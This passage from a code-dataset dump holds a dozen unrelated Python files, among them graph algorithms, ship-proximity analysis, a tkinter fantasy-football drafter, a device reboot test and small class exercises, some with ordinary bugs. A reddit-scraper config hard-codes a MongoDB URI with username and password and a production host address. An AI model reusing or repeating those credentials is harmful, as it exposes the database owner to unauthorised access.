'12345'\nwhile True:\n print('getting {}'.format(nothing))\n url = 'http://www.pythonchallenge.com/pc/def/linkedlist.php?nothing={}'.format(nothing)\n html = urllib.request.urlopen(url).read().decode('utf-8')\n m = re.search(r'and the next nothing is (\\d+)', html)\n if not m:\n print('found a page that does not match: {}'.format(html))\n break\n nothing = m.group(1)\n\n","sub_path":"linked_list.py","file_name":"linked_list.py","file_ext":"py","file_size_in_byte":586,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"312276434","text":"import os\n\nclass ToolBelt:\n #Get matches for the pattern within the file list\n def getMatches(self,filename, pattern):\n\n \n with open(os.getcwd()+'/textfiles/'+filename) as f:\n contents = f.read()\n matches =pattern.finditer(contents)\n return matches\n\n def printMatches(self, matches):\n for match in matches:\n for x in match:\n print(x.group(1))\n\n def createMasterList(self, matches):\n temp = []\n masterList = []\n for found in matches:\n if found.group(1) is not None:\n temp.append(found.group(1))\n if found.group(1) is None:\n masterList.append(temp.copy())\n temp.clear()\n return masterList \n","sub_path":"Python/CC - Compare Backend/Backend/FileSearcher.py","file_name":"FileSearcher.py","file_ext":"py","file_size_in_byte":794,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"498784667","text":"import pandas as pd\nfrom geopy.distance import great_circle\nimport datetime\nfrom itertools import combinations\nfrom Submission.functions import haversine, filter_df, box_intervals, time_overlap\n\ndf_file = '../Data/AIS_2017_12_Zone11.csv'\n\n# Rebuilds the dataframe from the chunks\ndf = pd.read_csv(df_file)\nprint('File read.', df.shape)\n\ndf = filter_df(df)\n\ndate_min = df.Date.min() # start date\ndate_max = df.Date.max() # end date\n\ndelta = date_max - date_min # timedelta\n\ndates = []\nfor i in range(delta.days + 1):\n dates.append(date_min + datetime.timedelta(i))\n\nfor date in dates:\n date_start_time = datetime.datetime.now()\n print(date)\n df_date = df[(df.Date >= date) & (df.Date < date+datetime.timedelta(1))]\n\n intervals = box_intervals(df_date)\n\n num_boxes = len(intervals['lat']*len(intervals['lon']))\n print('Number of boxes:', num_boxes)\n boxes_checked = 0\n\n ship_combos_checked = set()\n ships_interactions = 0\n # Loop through each sub-box\n for lat_i, temp_box_lat in enumerate(intervals['lat']):\n for lon_i, temp_box_lon in enumerate(intervals['lon']):\n boxes_checked = boxes_checked + 1\n if boxes_checked % 1000 == 0:\n print('Boxes checked:', boxes_checked)\n print('Total ships comparisons for this day:', len(ship_combos_checked))\n print('Total ship interactions for this day:', ships_interactions)\n # Don't loop through end of box\n if (lat_i < len(intervals['lat']) - 3) & (lon_i < len(intervals['lon']) - 3):\n # print('Starting box', temp_box_lat, temp_box_lon)\n interactions = pd.DataFrame\n # Get all data within box\n df_box = df_date[(df_date.LAT >= temp_box_lat)&(df_date.LAT <= intervals['lat'][lat_i+2])&(df_date.LON >= temp_box_lon)&(df_date.LON <= intervals['lon'][lon_i+2])]\n # Get ids of all ships that existed in the box\n ships = list(set(df_box.MMSI.tolist()))\n # If more than 1 ship\n if ships is not None and len(ships) > 1:\n ships.sort()\n # Create all combinations of ships that haven't been checked yet\n ship_combinations = set(list(combinations(ships, 2))) # 2 for pairs, 3 for triplets, etc\n ship_combinations = ship_combinations - ship_combos_checked\n for combo in ship_combinations:\n # Check for time overlap\n if time_overlap((df_box.BaseDateTime[df_box.MMSI == combo[0]].min(), df_box.BaseDateTime[df_box.MMSI == combo[0]].max()), (df_box.BaseDateTime[df_box.MMSI == combo[1]].min(), df_box.BaseDateTime[df_box.MMSI == combo[1]].max())):\n # Check distance between ships\n ship_combos_checked.add(combo)\n distance = great_circle((df_box.LAT[df_box.MMSI == combo[0]].iloc[0], df_box.LON[df_box.MMSI == combo[0]].iloc[0]), (df_box.LAT[df_box.MMSI == combo[1]].iloc[0], df_box.LON[df_box.MMSI == combo[1]].iloc[0])).feet / 3\n if distance <= 8000:\n ships_interactions = ships_interactions + 1\n date_end_time = datetime.datetime.now()\n time_delta = date_end_time - date_start_time\n print('Time to process:', time_delta.seconds / 60, 'minutes')\n","sub_path":"Submission/TeamBlueDots/Preprocessing_filter1/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3422,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"89805747","text":"# 1. The Bedroom object has the following attributes:\n# • length: length of the room in feet\n# • breadth: breadth of the room in feet\n# • height: breadth of the room in feet\n# • bed: an object representing the bed in the bedroom. Initialize as None.\n# • closet: an object representing the closet in the bedroom. Initialize as None.\n# • has_balcony: True or False depending on whether the room has a balcony or not\n# • has_window: True or False depending on whether the room has a window or not\n# • num_lights: The number of lights/lightsockets in the number\n# • has_ac: True or False depending on whether the room has a window or not\n# • has_fan: True or False depending on whether the room has a window or not\n# • num_charging_points: Number of charging points in the room.\n\n\n\n# 2. The Bedroom object has the following methods:\n\n# • carpet_area(): Returns the carpet area of the room which is calculated as length*breadth\n\n# • add_bed(): creates a Bed object using user inputs [using input() function] and assigns it to the bed attribute of the bedroom. While adding a bed make sure the dimensions of the bed are suitable for the remaining carpet area in the room.\n\n# For example: you cannot add a 9x9 bed in a 8X10 bedroom\n# For example 2: you cannot add a 6x3 bed in a 8x10 bedroom if there is already a closet which takes up 60 sq ft space.\n\n# • add_closet(): creates a Closet object using user inputs [using input() function] and assigns it to the closet attribute of the bedroom. While adding a close make sure the dimensions of the closet are suitable for the remaining carpet area in the room.\n\n# For example: you cannot add a 9x9 closet in a 8X10 bedroom\n# For example 2: you cannot add a 6x3 closet in a 8x10 bedroom if there is already a bed which takes up 60 sq ft space.\n\n# • remove_bed(): Checks if the bed attribute is None. If not, then makes it None and returns “bed removed from the room”. If bed attribute is already None, then it returns “No bed found in the room”.\n\n# • remove_closet(): Checks if the closet attribute is None. If not, then makes it None and returns “closet removed from the room”. If closet attribute is already None, then it returns “No closet found in the room”.\n\n\n\n\nfrom bed import Bed\nfrom closet import Closet\n\n\nclass Bedroom:\n def __init__(self, length, breadth, heigth, bed, closet, has_balcony,has_window, num_lights,has_ac, has_fan, has_charging_points):\n self.length = int(length)\n self.breadth = int(breadth)\n self.height = heigth\n self.bed = None\n self.closet = None\n self.has_balcony = has_balcony\n self.has_window = has_window\n self.num_lights = num_lights\n self.has_ac = has_ac\n self.has_fan = has_fan\n self.has_charging_points = has_charging_points\n\n\n\n def carpet_area(self):\n return (self.length * self.breadth)\n\n\n def add_bed(self):\n\n length = input('len of bed: ')\n bre = input('breadth of bed: ')\n year = input('enter the year made: ')\n posts = input('has posts?: ')\n headboard = input('has head board?: ')\n material = input('material: ')\n\n self.bed = Bed(length, bre, year, posts, headboard, material)\n\n \n def add_closet(self):\n\n length = input('length: ')\n breadth = input('breadth: ')\n height = input('height: ')\n max_capacity = input('max_capacity: ')\n items = input('items: ')\n\n self.closet = Closet(length, breadth,height, max_capacity, items)\n \n\n \n def remove_bed(self):\n\n if self.bed != None:\n self.bed = None\n print(\"bed removed from the room\") \n elif self.bed == None:\n print(\"No bed found in the room\")\n \n\n\n def remove_closet(self):\n if self.closet != None:\n self.closet = None\n print(\"closet removed from the room\") \n elif self.closet == None:\n print(\"No closet found in the room\")\n\n\nb_rm = Bedroom(44, 55, 66, None, 11, True, True, 14, True, False, 2)\n\n# print(b_rm.length)\n# print(b_rm.breadth)\n# print(b_rm.height)\n# print(b_rm.bed)\n# print(b_rm.closet)\n# print(b_rm.has_balcony)\n# print(b_rm.has_window)\n# print(b_rm.num_lights)\n# print(b_rm.has_ac)\n# print(b_rm.has_fan)\n# print(b_rm.num_charging_points)\n\n# result1 = b_rm.carpet_area()\n# print(f\"carpet area of the room is \", result1)\n# b_rm.add_bed()\n# b_rm.add_closet()\n# b_rm.remove_bed()\n# b_rm.remove_closet()\n","sub_path":"coding-challenges/week05/day02/apartment/bedroom.py","file_name":"bedroom.py","file_ext":"py","file_size_in_byte":4488,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"57191319","text":"from seeder import Seeder\n\nimport random\n\nfrom datetime import datetime, timedelta\n\n\nclass DateTimeSeeder(Seeder):\n \"\"\"\n Class initialized with instance object and\n DateTime field along with options:\n\n + past_only =>\n (defaults to False) if True field will be a past datetime.\n\n + future_only =>\n (defaults to False) if True field will be a future datetime.\n\n + default =>\n (defaults to False) if anything other than False datetime will be\n the provided value even if the provided value is not a valid\n DateTime object.\n \"\"\"\n\n def __init__(self, instance, field_name,\n past_only=False, future_only=False, default=False,\n months=0, weeks=0, days=0, hours=0, minutes=0, seconds=0,\n milliseconds=0, microseconds=0, *args, **kwargs):\n\n super(DateTimeSeeder, self)\\\n .__init__(instance, field_name, *args, **kwargs)\n\n self.past_only = past_only\n self.future_only = future_only\n self.default = default\n\n self.weeks = weeks\n self.days = days\n self.hours = hours\n self.minutes = minutes\n self.seconds = seconds\n self.microseconds = microseconds\n self.milliseconds = milliseconds\n\n self.generate_time_key()\n self.generate_time_diff()\n\n\n def dict(self):\n return {\n 'weeks' :self.weeks,\n 'days' :self.days,\n 'hours' :self.hours,\n 'minutes' :self.minutes,\n 'seconds' :self.seconds,\n 'milliseconds' :self.milliseconds,\n 'microseconds' :self.microseconds,\n }\n\n def generate_time_key(self):\n self.time_key = (\n self.weeks,\n self.days,\n self.hours,\n self.minutes,\n self.seconds,\n self.milliseconds,\n self.microseconds,\n )\n def generate_time_diff(self):\n #imperative nothing.\n time_dict = {\n (0,0,0,0,0,0,0): timedelta(days=random.uniform(0,365))\n }\n self.time_diff = time_dict.get(\n self.time_key,\n timedelta(**self.dict())\n )\n\n def now(self):\n return datetime.utcnow()\n\n def past(self):\n return self.now() - self.time_diff\n\n def future(self):\n return self.now() + self.time_diff\n\n def generate_value(self):\n if self.default != False:\n return self.default\n elif self.past_only == True:\n return self.past()\n elif self.future_only == True:\n return self.future()\n else:\n return random.choice([self.past, self.future])()\n","sub_path":"flask_db_seeder/seeders/datetime_seeder.py","file_name":"datetime_seeder.py","file_ext":"py","file_size_in_byte":2776,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"588215859","text":"import copy\nimport sys\nimport operator\n\n\nclass Graph:\n def __init__(self, graph):\n self.t = -1 # finishing time\n self.s = 0 # leaders\n self.exploded = [False] * len(graph)\n self.graph = copy.deepcopy(graph)\n self.finishing_times = [None] * len(self.graph)\n self.leaders = {}\n self.reverse_graph = []\n\n def __str__(self):\n return str(self.exploded)\n # return out\n\n def make_revere_graph(self):\n reverse_graph = [[] for x in range(len(self.graph))]\n for node, _ in enumerate(self.graph):\n for edge in self.graph[node]:\n reverse_graph[edge].append(node)\n self.reverse_graph = reverse_graph\n\n def make_finishing_times(self):\n self.make_revere_graph()\n for node in reversed(range(len(self.reverse_graph))):\n if not self.exploded[node]:\n self.dfs1(node)\n self.exploded = [False] * len(self.graph)\n\n def get_strongly_connected_comp_by_leaders(self):\n for node in reversed(self.finishing_times):\n if not self.exploded[node]:\n self.s = node\n self.dfs2(node)\n self.exploded = [False] * len(self.graph)\n\n def dfs2(self, node):\n self.exploded[node] = True\n\n if self.s in self.leaders:\n self.leaders[self.s] += 1\n else:\n self.leaders[self.s] = 1\n\n for adj_node in self.graph[node]:\n if not self.exploded[adj_node]:\n self.dfs2(adj_node)\n\n def print_reserve_graph(self):\n print(self.finishing_times)\n\n def dfs1(self, node):\n self.exploded[node] = True\n for adj_node in self.reverse_graph[node]:\n if not self.exploded[adj_node]:\n self.dfs1(adj_node)\n self.t += 1\n self.finishing_times[self.t] = node\n\n def get_sorted_leaders(self, quantity=0, order=\"DESC\"):\n sorted_leaders = sorted(self.leaders.items(), key=operator.itemgetter(1), reverse=order == \"DESC\")\n\n if quantity and quantity < len(sorted_leaders):\n return sorted_leaders[:quantity]\n else:\n return sorted_leaders\n\n\ndef make_graph_from_txt(txt):\n out_dict = {}\n file = open(txt, 'r')\n nodes_quantity = 0\n for ln in file:\n node_head = int(ln.split()[1]) - 1\n node_tail = int(ln.split()[0]) - 1\n if node_head > nodes_quantity:\n nodes_quantity = node_head\n if node_tail > nodes_quantity:\n nodes_quantity = node_tail\n if node_tail in out_dict:\n out_dict[node_tail].append(node_head)\n else:\n out_dict[node_tail] = [node_head]\n\n out = [[] for x in range(nodes_quantity + 1)]\n for node in out_dict:\n out[node] = out_dict[node]\n\n file.close()\n return out\n\n\ndef main():\n gr = Graph([\n [3],\n [7],\n [5],\n [6],\n [1],\n [8],\n [0],\n [5, 4],\n [6, 2]\n ])\n\n gr.make_revere_graph()\n gr.make_finishing_times()\n gr.get_strongly_connected_comp_by_leaders()\n print(gr.leaders)\n\n\n # graph_init = make_graph_from_txt('h:\\\\_410e934e6553ac56409b2cb7096a44aa_SCC.txt')\n # graph = Graph(graph_init)\n # graph.make_revere_graph()\n # graph.make_finishing_times()\n # graph.get_strongly_connected_comp()\n\n\nif __name__ == '__main__':\n sys.setrecursionlimit(500000)\n main()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3420,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"156455897","text":"PRODUCTION = False\nTEST_DB_URI = 'mongodb://elc:yak@ds047652.mongolab.com:47652/redditdump'\nTEST_DB_NAME = 'redditdump'\nPROD_HOST = '45.55.235.216'\nPROD_PORT = 27017\nSUBREDDITS = [\n {'name': 'McGill University', 'subreddit': 'mcgill'},\n {'name': 'Georgia Tech', 'subreddit': 'gatech'},\n {'name': 'UT Austin', 'subreddit': 'UTAustin'},\n {'name': 'Penn State University', 'subreddit': 'PennStateUniversity'},\n {'name': 'Purdue', 'subreddit': 'purdue'},\n {'name': 'UC Berkeley', 'subreddit': 'berkeley'},\n {'name': 'CalPoly Ubispo', 'subreddit': 'CalPoly'},\n {'name': 'UC Santa Barbara', 'subreddit': 'ucsantabarbara'},\n {'name': 'North Carolina State University', 'subreddit': 'ncsu'},\n {'name': 'York University', 'subreddit': 'yorku'},\n {'name': 'Texas A&M', 'subreddit': 'aggies'},\n {'name': 'Arizona State University', 'subreddit': 'asu'},\n {'name': 'University of Central Florida', 'subreddit': 'ucf'},\n {'name': 'University of British Columbia', 'subreddit': 'UBC'},\n {'name': 'University of Maryland', 'subreddit': 'UMD'},\n {'name': 'Rochester Institute of Technology', 'subreddit': 'rit'},\n {'name': 'Ohio State University', 'subreddit': 'OSU'},\n {'name': 'UC San Diego', 'subreddit': 'ucsd'},\n {'name': 'University of Missouri', 'subreddit': 'mizzou'},\n {'name': 'University of Georgia', 'subreddit': 'UGA'}\n ]\n\n","sub_path":"server/collection/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":1544,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"440387848","text":"\"\"\"\n@copyright: (c)Copyright 2013, Intel Corporation All Rights Reserved.\nThe source code contained or described here in and all documents related\nto the source code (\"Material\") are owned by Intel Corporation or its\nsuppliers or licensors. Title to the Material remains with Intel Corporation\nor its suppliers and licensors. The Material contains trade secrets and\nproprietary and confidential information of Intel or its suppliers and\nlicensors.\n\nThe Material is protected by worldwide copyright and trade secret laws and\ntreaty provisions. No part of the Material may be used, copied, reproduced,\nmodified, published, uploaded, posted, transmitted, distributed, or disclosed\nin any way without Intel's prior express written permission.\n\nNo license under any patent, copyright, trade secret or other intellectual\nproperty right is granted to or conferred upon you by disclosure or delivery\nof the Materials, either expressly, by implication, inducement, estoppel or\notherwise. Any license under such intellectual property rights must be express\nand approved by Intel in writing.\n\n@organization: INTEL MCG PSI\n@summary: This file implements the reboot from MOS to MOS UC\n@since: 03/03/2014\n@author: Chenghua Yang\n\"\"\"\n\nfrom UtilitiesFWK.Utilities import Global\nfrom acs_test_scripts.UseCase.UseCaseBase import UseCaseBase\nimport time\n\n\nclass LabDutRebootWhenMbOff(UseCaseBase):\n\n \"\"\"\n This Use Case reboots the DUT when Radio OFF (mobile broadband off)\n \"\"\"\n\n def __init__(self, tc_name, global_config):\n \"\"\"\n Constructor\n \"\"\"\n\n # Call UseCase base Init function\n UseCaseBase.__init__(self, tc_name, global_config)\n\n # Get UECmdLayer for Data Use Cases\n self._networking_api = self._device.get_uecmd(\"Networking\")\n self._modem_api = self._device.get_uecmd(\"Modem\")\n\n # Initialize some attributes\n self._boot_timeout = None\n self._settledown_duration = None\n\n # Get bootTimeout value either from parameter file or\n # default value from phone catalog\n if self._tc_parameters.get_param_value(\"BOOT_TIMEOUT\") != \"\":\n self._boot_timeout = \\\n int(self._tc_parameters.get_param_value(\"BOOT_TIMEOUT\"))\n\n # Get settledown duration value either from parameter file or\n # default value from phone catalog\n if self._tc_parameters.get_param_value(\"SETTLEDOWN_DURATION\") != \"\":\n self._settledown_duration = \\\n int(self._tc_parameters.get_param_value(\"SETTLEDOWN_DURATION\"))\n\n # Get UECmdLayer for Data Use Cases\n self._modem_api = self._device.get_uecmd(\"Modem\")\n\n#------------------------------------------------------------------------------\n\n def run_test(self):\n \"\"\"\n Execute the test\n \"\"\"\n\n # Run UC base run_test\n UseCaseBase.run_test(self)\n\n # Initialize the return code and message of the test\n return_code = Global.FAILURE\n return_message = \"An error occurred.\"\n\n # turn off mobile broadband\n self._networking_api.reset_mobile_broadband_mode(0)\n\n time.sleep(5)\n mode_before_reboot = str(self._modem_api.get_modem_power_status())\n self._logger.info (\"Starting reboot - Mobile Broadband before reboot is %s\" % mode_before_reboot)\n\n # Restart the phone in MOS\n rebooted = self._device.reboot(self._settledown_duration )\n if rebooted:\n return_code = Global.SUCCESS\n return_message = \"Board rebooted successfully.\"\n else:\n return_code = Global.FAILURE\n return_message = \"An error occurred when rebooting the board.\"\n\n self._logger.info(\"Start To Detect Modom connection\")\n result = self._modem_api.detect_modem_connection()\n if result == True :\n self._logger.info( \"Modem is connected and ready to use\" )\n else:\n self._logger.info( \"There is no modem connected\" )\n return_code = Global.FAILURE\n return_message = \"Board was not rebooted properly.\"\n return return_code, return_message\n\n # check if the mobile broadband stays off after reboot\n current_mode = str(self._modem_api.get_modem_power_status())\n if mode_before_reboot == current_mode:\n self._logger.info (\"Mobile Broadband before reboot is %s and after reboot is %s\" % (mode_before_reboot, current_mode) )\n return_code = Global.SUCCESS\n return_message = \"Board rebooted successfully and Mobile Broadband before reboot is %s and after reboot is %s\" % (mode_before_reboot, current_mode)\n\n # Return the verdict and the message\n return return_code, return_message\n","sub_path":"ACS_v.18.20.4_1/ACS/acs_test_scripts/UseCase/System/LAB_DUT_REBOOT_WHEN_MB_OFF.py","file_name":"LAB_DUT_REBOOT_WHEN_MB_OFF.py","file_ext":"py","file_size_in_byte":4733,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"577378222","text":"from .models import OpinionTable\nfrom accounts.person_controller import Usuario\nfrom calificaciones.calificacion_controller import Calificacion\nfrom lugares.lugar_controller import Lugar\n\n\nclass Opinion(Calificacion):\n def __init__(self, lugar, persona):\n self._lugar = lugar\n self._persona = persona\n # lugar_obj = Lugar()\n # self._lugar = lugar_obj.buscar_lugar(lugar_id)\n\n # persona_obj = Usuario()\n # self._usuario = persona_obj.search_client(persona_id)\n\n def agregar_opinion(self, opinion_description):\n opinion = OpinionTable(\n descripcion_opinion=opinion_description,\n lugar=self._lugar,\n usuario=self._usuario\n )\n opinion.save()\n\n def calificar(self, id_opinion, score):\n\n opinion = OpinionTable.objects.get(id=id_opinion)\n actual_score = opinion.puntaje\n\n opinion.puntaje = actual_score + score if actual_score + score > 0 else 0\n\n calificaciones = OpinionTable.objects.filter(tipo_calificacion='usuario')\n\n for calificacion in calificaciones:\n if calificacion.min_puntaje < opinion.puntaje <= calificacion.max_puntaje:\n opinion.calificacion = calificacion\n break\n\n opinion.save()\n\n\n\n\n\n\n\n","sub_path":"poo/opiniones/opinion.py","file_name":"opinion.py","file_ext":"py","file_size_in_byte":1287,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"141456652","text":"def f(a, b, c):\n return (b + c * a) * a \n\n# List of dicts with each dict containing named arguments.\nINPUTS = [{\"a\": a, \"b\": b, \"c\": c} for a, b, c in zip(list(range(30)), list(range(30, 60)), list(range(60, 90)))]\nOUTPUTS = [f(**item) for item in INPUTS]\n\nMAX_EXPR_ELEMENTS = 30\nMAX_GENERATIONS = 500\nMAX_POPULATION = 150\nCONSTANTS = {} #{\"PI\": 3.14} # Ephemeral constant, evaluated at call time, name to value\nfrom operator import truediv, mul, add, sub\nFUNCTIONS = [truediv, mul, add, sub]\n\n# Between 1 and 0\n# For all inputs to all outputs\nfrom statistics import normalize\ndef validate(predicted, actual, OUTPUTS):\n worst = max(OUTPUTS)\n return normalize(value=abs(predicted - actual), minimum=0, maximum=worst)\n","sub_path":"config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":725,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"116649181","text":"import tkinter as tk\nfrom tkinter import ttk\nfrom csv_scraper import acquire_data\n\nclass MainApp(tk.Tk):\n def __init__(self, *args, **kwargs):\n tk.Tk.__init__(self, *args, **kwargs)\n self.title(\"Fantasy Football App\")\n\n mainframe = tk.Frame(self)\n mainframe.pack(side = \"top\", fill = \"both\", expand = True)\n mainframe.grid_rowconfigure(0, weight=1)\n mainframe.grid_columnconfigure(0, weight=1)\n\n self.frames = {}\n for F in (DraftPage, Order, Intro):\n frame = F(mainframe, self)\n self.frames[F] = frame\n # put all of the pages in the same location; \n # the one on the top of the stacking order\n # will be the one that is visible.\n frame.grid(row=0, column=0, sticky=\"nsew\")\n\n self.show_frame(Intro)\n\n def show_frame(self, c):\n frame = self.frames[c]\n frame.tkraise()\n\nclass Intro(tk.Frame):\n teams = []\n \n def __init__(self, parent, controller):\n tk.Frame.__init__(self, parent)\n \n number_teams = tk.StringVar()\n \n number_teams_label = ttk.Label(self, text = \"Number of Teams:\")\n number_teams_label.grid(column = 1, row = 1)\n number_teams_entry = ttk.Entry(self, textvariable = number_teams)\n number_teams_entry.grid(column = 1, row = 2)\n\n owners_label = ttk.Label(self, text = \"Owner Names:\")\n owners_label.grid(column = 1, row = 4)\n owners_entry = tk.Text(self, height = 10, width = 40)\n owners_entry.grid(column = 1, row = 5, sticky = 'WE')\n\n submit = ttk.Button(self, text = \"Enter\", command = lambda: self.create_teams(owners_entry, number_teams, controller))\n submit.grid(column = 1, row = 6, sticky = 'S') \n\n def create_teams(self, text, team_number, controller):\n owners = text.get('1.0', 'end')\n owners = owners.split()\n number_teams = team_number.get()\n if number_teams.isdigit():\n for i in range(int(number_teams)):\n try:\n Intro.teams.append(owners[i] + \"'s team\")\n except IndexError:\n Intro.teams.append(\"Team \" + str(i + 1))\n controller.show_frame(Order)\n\nclass Order(Intro):\n teams = []\n def __init__(self, parent, controller, *args):\n tk.Frame.__init__(self, parent) \n owners = Intro.teams\n last_index = len(owners) - 1\n\n order = ttk.Treeview(self, show = 'headings', columns = ('name', 'order'), selectmode = 'browse')\n order.heading('order', text = 'Order')\n order.heading('name', text = 'Name')\n print(owners)\n count = 1\n for team in owners:\n order.insert('', 'end', iid = team, text = team, values = (team, count))\n count += 1\n order.grid(column = 1, row = 1)\n\n up = ttk.Button(self, text = \"Move Up\", command = lambda: self.move_up(order))\n up.grid(column = 1, row = 2, sticky = 'W')\n down = ttk.Button(self, text = \"Move Down\", command = lambda: self.move_down(order, last_index))\n down.grid(column = 1, row = 2, sticky = 'E')\n enter = ttk.Button(self, text =\"Enter\", command = lambda: self.enter(order, controller))\n enter.grid(column = 1, row = 2, sticky = 'N')\n back = ttk.Button(self, text = \"Back\", command = lambda: self.back(controller))\n back.grid(column = 1, row = 3, sticky = 'S')\n\n\n def move_up(self, order):\n try:\n selected_item = order.selection()[0]\n selected_index = order.index(selected_item)\n\n previous_item = order.prev(selected_item)\n previous_index = order.index(previous_item)\n if selected_index:\n order.move(selected_item, '', previous_index)\n order.set(selected_item, column = 'order', value = previous_index + 1)\n order.set(previous_item, column = 'order', value = selected_index + 1)\n except IndexError:\n pass\n\n def move_down(self, order, last_index):\n try:\n selected_item = order.selection()[0]\n selected_index = order.index(selected_item)\n\n next_item = order.next(selected_item)\n next_index = order.index(next_item)\n if selected_index != last_index:\n order.move(selected_item, '', next_index)\n order.set(selected_item, column = 'order', value = next_index + 1)\n order.set(next_item, column = 'order', value = selected_index + 1)\n except IndexError:\n pass\n\n def enter(self, order, controller):\n for key in order.get_children(''):\n Order.owner_list.append(order.set(key))\n controller.show_frame(DraftPage)\n\n def back(self, controller):\n controller.show_frame(Intro)\n\nclass DraftPage(Order):\n\n def __init__(self, parent, controller):\n tk.Frame.__init__(self, parent) \n\n player_pool = acquire_data('projections.csv')\n categories = ['name', 'pos', 'rank', 'pos Rank', 'VOR', 'risk']\n\n pool = ttk.Treeview(self, columns = categories, show = 'headings', selectmode = 'browse')\n for category in categories:\n pool.heading(category, text = category.capitalize(), command = lambda category_ = category: self.column_sort(pool, category_, False))\n for key in player_pool:\n pool.insert('', 'end', iid = key, text = key, values = (key, player_pool[key]['pos'], player_pool[key]['overallRank'], player_pool[key]['positionRank'], player_pool[key]['vor'], player_pool[key]['risk']))\n pool.grid(column = 1, row = 1)\n\n s = ttk.Scrollbar( self, orient = 'vertical', command = lambda: pool.yview)\n s.grid(column = 2, row = 1, sticky = 'NS')\n\n enter = ttk.Button(self, text =\"Enter\", command = lambda: self.pick_player(pool))\n enter.grid(column = 1, row = 2, sticky = 'S')\n back = ttk.Button(self, text =\"Back\", command = lambda: self.back(controller))\n back.grid(column = 1, row = 3, sticky = 'S')\n\n ttk.Sizegrip(self).grid(column=999, row=999, sticky='SE')\n\n def column_sort(self, tree, column, reverse):\n value_key_list = []\n if column == 'name' or column == 'pos':\n for key in tree.get_children(''):\n value_key_list.append((tree.set(key, column), key))\n else:\n for key in tree.get_children(''):\n value_key_list.append((float(tree.set(key, column)), key))\n\n value_key_list.sort(reverse = reverse)\n\n for index, (value, key) in enumerate(value_key_list):\n tree.move(key, '', index)\n\n tree.heading(column, command = lambda column_ = column: column_sort(tree, column_, not reverse))\n\n def pick_player(self, pool):\n try:\n selected_item = pool.selection()[0]\n picked_player = pool.item(selected_item)\n print(picked_player)\n except IndexError:\n pass\n\n def back(self, controller):\n controller.show_frame(Order)\n\nif __name__ == \"__main__\":\n app = MainApp()\n app.mainloop()","sub_path":"a.py","file_name":"a.py","file_ext":"py","file_size_in_byte":7127,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"134204352","text":"# Copyright 2023 The MathWorks, Inc.\n\n\nimport re\nimport time\n\n\ndef wait_for_file(host, filepath, timeout=30):\n \"\"\"Wait for a file to be created in a 'testinfra.Host' object.\n\n HOST is a testinfra.Host object\n FILEPATH is the full path of the file to be waited for\n\n If the file is not found after TIMEOUT seconds, an error is raised.\n \"\"\"\n start = time.time()\n while (time.time() - start < timeout) and not host.file(filepath).exists:\n time.sleep(0.2)\n if not host.file(filepath).exists:\n raise TimeoutError(\n f\"Hit waiting time of timeout={timeout}s for file {filepath}.\"\n )\n\n\ndef get_release_from_string(string):\n match = re.search(\"r20[2-9][0-9][ab]\", string, re.IGNORECASE)\n if match:\n return match.group(0)\n else:\n return \"\"\n\n\ndef wait_for_cmd(container, cmd, timeout=10):\n \"\"\"\n Wait until a process is started in the container CONTAINER. The process that\n is waited for has a \"CMD\" that regex-matches the input CMD.\n CONTAINER is a Container class from the docker package.\"\"\"\n\n def update_cmd_list():\n ps_res = container.top(ps_args=\"-o pid,cmd\")\n idx = ps_res[\"Titles\"].index(\"CMD\")\n return [proc[idx] for proc in ps_res[\"Processes\"]]\n\n start = time.time()\n while \"\\n\".join(update_cmd_list()).count(cmd) == 0 and (\n time.time() - start < timeout\n ):\n time.sleep(0.2)\n if \"\\n\".join(update_cmd_list()).count(cmd) == 0:\n raise ValueError(f\"The process {cmd} is not running.\")\n","sub_path":"tests/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1528,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"250129537","text":"# @copyright@\n# Copyright (c) 2006 - 2018 Teradata\n# All rights reserved. Stacki(r) v5.x stacki.com\n# https://github.com/Teradata/stacki/blob/master/LICENSE.txt\n# @copyright@\n#\n# @rocks@\n# Copyright (c) 2000 - 2010 The Regents of the University of California\n# All rights reserved. Rocks(r) v5.4 www.rocksclusters.org\n# https://github.com/Teradata/stacki/blob/master/LICENSE-ROCKS.txt\n# @rocks@\n\nimport stack.commands\n\n\nclass Command(stack.commands.list.box.command,\n\t stack.commands.RollArgumentProcessor):\n\t\"\"\"\n\tList the pallets enabled in each box.\n\t\n\t\n\tList of boxes.\n\t\n\n\t\n\tList the pallets used in the \"default\" box.\n\t\n\t\"\"\"\t\t\n\n\tdef run(self, params, args):\n\t\tself.beginOutput()\n\n\t\tboxes = self.getBoxNames(args)\n\n\t\tfor box in boxes:\n\t\t\tself.db.execute(\"\"\"select r.name, r.arch, r.version, r.rel, r.os from\n\t\t\t\tstacks s, rolls r, boxes b where\n\t\t\t\ts.roll = r.id and s.box = b.id and\n\t\t\t\tb.name = '%s' \"\"\" % box)\n\t\t\t\n\t\t\tfor (roll, arch, version, release, osname) in self.db.fetchall():\n\t\t\t\tself.addOutput(box, (roll, arch, version, release, osname))\n\n\t\tself.endOutput(header=['box', 'pallet', 'arch', 'version', 'release', 